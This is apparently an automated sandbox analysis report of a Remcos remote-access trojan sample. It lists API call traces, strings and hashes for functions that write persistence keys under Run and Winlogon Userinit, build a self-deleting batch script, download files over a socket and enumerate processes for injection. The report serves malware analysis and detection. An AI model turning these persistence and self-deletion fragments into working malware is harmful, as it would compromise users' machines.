                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$??1?$basic_string@$V10@$D@2@@0@$Hstd@@$?c_str@?$basic_string@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@V10@@$File$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@D?$basic_ofstream@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                                          • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$del "$del %0 $exit $explorer.exe$if exist "$open$update.bat
                                          • API String ID: 3539474836-3658685564
                                          • Opcode ID: 939fdcaa365f2f9e0a4b8f923dddd67c95833ac78a1ffec8c77c10da8eb6e1f2
                                          • Instruction ID: 85814611d3c695b275b499f4b080fe16a1c3fdb49b7e8a264d8a5f024fe5fead
                                          • Opcode Fuzzy Hash: 939fdcaa365f2f9e0a4b8f923dddd67c95833ac78a1ffec8c77c10da8eb6e1f2
                                          • Instruction Fuzzy Hash: C7B16172940109ABDB10EBA0DD4EEDE7B7DAB54304F1040B7F506B2191DBB89E898B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,7313CB00,00000001), ref: 004069CA
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,7313CB00,00000001), ref: 004069EF
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415940,7313CB00,00000001), ref: 00406A1E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415940,7313CB00,00000001), ref: 00406A4C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,7313CB00,00000001), ref: 00406A6C
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,7313CB00,00000001), ref: 00406A9F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406AA8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000000), ref: 00406AC2
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406AE9
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,74B5FBA0), ref: 00405263
                                            • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                            • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406AF3
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406AFB
                                          • getenv.MSVCRT ref: 00406B0F
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406B1A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406B25
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406B30
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406B46
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406B62
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00406B69
                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406B77
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 00406B87
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406B94
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406BA0
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406BC0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406BD7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406BE7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406BF4
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C01
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C0C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C15
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C1E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406C3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406C4D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406C5A
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C67
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C72
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C7B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C84
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406C8C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00406CA7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00406CB4
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00406CC1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CCC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CD5
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406CE7
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406CF5
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406D00
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00406D0D
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00406D1B
                                          • exit.MSVCRT ref: 00406D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$V10@$??1?$basic_string@?c_str@?$basic_string@D@2@@0@$Hstd@@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@FileV10@@$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                                          • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\uninstall.bat$del "$del %0 $exit $explorer.exe$if exist "$open
                                          • API String ID: 2435849188-468332953
                                          • Opcode ID: 59b310098eb89ae822d7a6e4498852e0b99b398af8ab11746d0502617c4c2780
                                          • Instruction ID: 79bb7098ec12771f3f12c2aeb3a0bf44cec98225d0af6e33e903258e68a155bd
                                          • Opcode Fuzzy Hash: 59b310098eb89ae822d7a6e4498852e0b99b398af8ab11746d0502617c4c2780
                                          • Instruction Fuzzy Hash: A8A17172940209ABDB10ABA0DD4AFDE777DEB54304F1040BBF506B2191DAF85EC98B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004020E1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415268,?,?,00403DDD,00000001), ref: 004020EF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024,00000001,00000001,00000000,7313CB00,7313CB00), ref: 0040CAC3
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040CAD0
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040CADC
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 0040CAF4
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • __aulldiv.LIBCMT ref: 0040CB38
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040CB71
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(0040C0FA,00000000,?,?,0000FDE8,00000000), ref: 0040CB85
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,0000FDE8), ref: 0040CB95
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,0000FDE8,?), ref: 0040CBA6
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filedown,00415268,?,00415268,00000001,00415268,?,00415268,00000000,00415268,00000000,00415268,?,00415268,00000000), ref: 0040CBF1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040CC01
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040CC0E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC1E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC2E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040CC3E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC4E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC5B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC6B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC7B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC8B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC9B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCAB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCD4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCE0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCEC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCF8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD04
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD0D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD19
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD25
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD31
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD46
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD52
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD5E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD67
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD70
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD79
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCB5
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,0000FDE8,00000000), ref: 0040CDBA
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040CDE3
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopenfile,00415268,?,00415268,?), ref: 0040CE08
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040CE15
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040CE22
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040CE2C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE41
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE4A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE53
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE61
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE75
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE7E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE87
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$D@std@@@std@@$??0?$basic_string@$?close@?$basic_ifstream@D@1@@V10@@V12@$??0?$basic_ifstream@??2@?c_str@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@H@2@V01@@V?$fpos@W4seekdir@ios_base@2@@__aulldivconnectfree
                                          • String ID: err_notopenfile$filedown
                                          • API String ID: 289020620-2089879270
                                          • Opcode ID: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                                          • Instruction ID: 75517663f7f8035d4815827909ffde7696f2aa65873f957ae4acf3b8a579f94d
                                          • Opcode Fuzzy Hash: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                                          • Instruction Fuzzy Hash: 12B13171D0011EDBDF14EBA0ED899DEBB78BF55304F1041B6F506A2091EA785E89CFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                                          • Process32First.KERNEL32(?,?), ref: 00407E79
                                          • Process32Next.KERNEL32 ref: 00407E88
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000128), ref: 00407EA8
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                                          • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                                          • Process32Next.KERNEL32 ref: 00407EFF
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F59
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00407F80
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F89
                                          • CloseHandle.KERNEL32(?,?,00000128), ref: 00407F92
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F99
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FA8
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FBC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FC5
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(Program Files\,00000000), ref: 00407FDF
                                          • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,?,Program Files (x86)\), ref: 00408004
                                          • ??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00408015
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408029
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408037
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(?,00000025,00000001), ref: 0040804E
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040805A
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00408072
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040808B
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 0040809D
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 004080B3
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 004080BF
                                          • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 004080CD
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004080D9
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 004080F7
                                          • CloseHandle.KERNEL32(00000000), ref: 00408110
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408121
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040812A
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040813A
                                            • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                                            • Part of subcall function 0040F0DF: IsWow64Process.KERNEL32(00000000,?,?,00407F70,?), ref: 0040F100
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@std@@@std@@$??8std@@V?$basic_string@$D@2@@0@V12@$Process32$??0?$basic_string@??4?$basic_string@?begin@?$basic_string@?c_str@?$basic_string@CloseCreateD?$basic_ifstream@D@1@@HandleNextProcessV01@V01@@$??0?$basic_ifstream@??2@?assign@?$basic_string@?close@?$basic_ifstream@?end@?$basic_string@?find@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?replace@?$basic_string@?seekg@?$basic_istream@?tellg@?$basic_istream@D@2@@0@0@D@2@@0@@FileFirstH@2@ModuleMutexNameOpenSnapshotToolhelp32V12@@V?$fpos@W4seekdir@ios_base@2@@Wow64
                                          • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                          • API String ID: 3809396517-694575909
                                          • Opcode ID: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                                          • Instruction ID: b1c41ab4f00258a1a6098e1fdbc2013eb857e20770a4aaf06870f1c586b70205
                                          • Opcode Fuzzy Hash: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
